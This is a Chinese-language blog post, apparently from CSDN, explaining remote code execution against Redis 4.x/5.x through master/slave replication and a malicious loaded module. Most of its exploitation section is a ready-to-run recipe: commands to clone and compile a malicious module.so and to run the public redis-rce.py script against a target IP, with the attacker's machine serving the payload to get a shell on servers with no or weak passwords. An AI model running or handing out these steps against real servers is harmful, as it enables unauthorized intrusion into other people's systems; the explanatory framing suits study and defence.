Redis主从复制RCE(4.x、5.x)

1.漏洞解析

1.1什么是主从复制

主从复制是指将一台Redis主服务器的数据,复制到其他的Redis从服务器。前者称为主节点(master),后者称为从节点(slave)

主服务器可以进行读写操作,当发生写操作时自动将写操作同步给从服务器,而从服务器一般是只读,并接受主服务器同步过来写操作命令,然后执行这条命令。

1.2漏洞原理

Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。

在Reids 4.x之后,Redis新增了模块功能,通过外部拓展,可以实现在Redis中实现一个新的Redis命令,通过写C语言编译并加载恶意的.so文件,达到代码执行的目的

2.利用条件

  • 未授权访问 : 未启用认证功能或认证密码为空,用户可直接连接
  • 授权访问 : 能通过弱口令认证或者直接知道认证密码访问到Redis服务器

3.利用方式

通过脚本实现一键自动化getshell:

脚本链接:GitHub - n0b0dyCN/RedisModules-ExecuteCommand: Tools, utilities and scripts to help you write redis modules!

1、攻击端生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成。

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand 
cd RedisModules-ExecuteCommand/ 
make

2、攻击端执行: python redis-rce.py -r 目标ip-p 目标端口 -L 本地ip -f 恶意.so

git clone https://github.com/Ridter/redis-rce.git 
cd redis-rce/ 
cp ../RedisModules-ExecuteCommand/src/module.so ./ 
pip install -r requirements.txt 
python redis-rce.py -r 靶机IP -p 6379 -L 攻击机IP -f module.so

执行效果如下:

4.总结

这里的Redis主从复制的利用只针对4.x与5.x的版本,如果版本不在这个范围,可以查看我的博客主页其他的Redis漏洞利用方式。

Redis未授权访问漏洞-CSDN博客

Redis Lua沙盒绕过RCE(CVE-2022-0543)-CSDN博客

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值